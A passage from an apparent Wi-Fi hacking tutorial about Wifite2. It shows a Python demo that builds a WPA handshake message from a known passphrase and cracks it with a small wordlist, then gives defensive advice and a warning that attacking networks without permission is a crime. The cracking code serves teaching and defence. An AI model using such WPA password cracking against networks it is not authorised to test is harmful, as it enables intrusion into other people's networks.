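def make_demo_capture(passphrase: str = "christmasham") -> bytes:
    kck = wpa_ptk(wpa_psk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    unsigned = build_eapol_m2(1, SNONCE)
    return build_eapol_m2(1, SNONCE, mic=eapol_mic(kck, unsigned, 2))


if __name__ == "__main__":
    m2 = make_demo_capture()
    words = ["password", "12345678", "short", "christmasham", "letmein1"]
    print("PSK:", crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, m2, words))
```

Two things the code makes obvious: the SSID is part of the PBKDF2 salt, so precomputed tables only help per network name, and every candidate costs 8192 HMAC-SHA1 calls before the cheap MIC comparison, which is why the quality of the wordlist matters more than raw speed.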

Some Practical Warnings & Defense

Wifite2 is an example of how even simple scripts can be effective against networks with common weaknesses such as WPS setup PINs and weak passwords. With more and more of the advanced attacks being automated, it is important to learn about the most common and most effective ways of attacking a Wi-Fi network.

In general, the best defense against tools like Wifite2 is to make sure WPS is disabled (and to verify with a scan that the router really has stopped advertising it) and to choose a very strong Wi-Fi password that you don't share with anyone who doesn't need it.

Note that by choosing "all" from the target list, Wifite2 will attack every network it discovered, not just the ones you are permitted to attack. You must have permission to use this tool on any network you attack, because attacking someone else's network without permission is a crime and can get you into a lot of trouble. Blaming the script is no excuse if you are caught attacking an important network, so make sure Wifite2 only targets networks you are authorized to audit.

I hope you enjoyed this guide to automating Wi-Fi hacking with Wifite2! If you have any questions about this guide or Wi-Fi hacking tools, or if you have a comment, leave it below in the comments or reach me on Twitter @KodyKinzie.


Cover photo by Kody / Null Byte



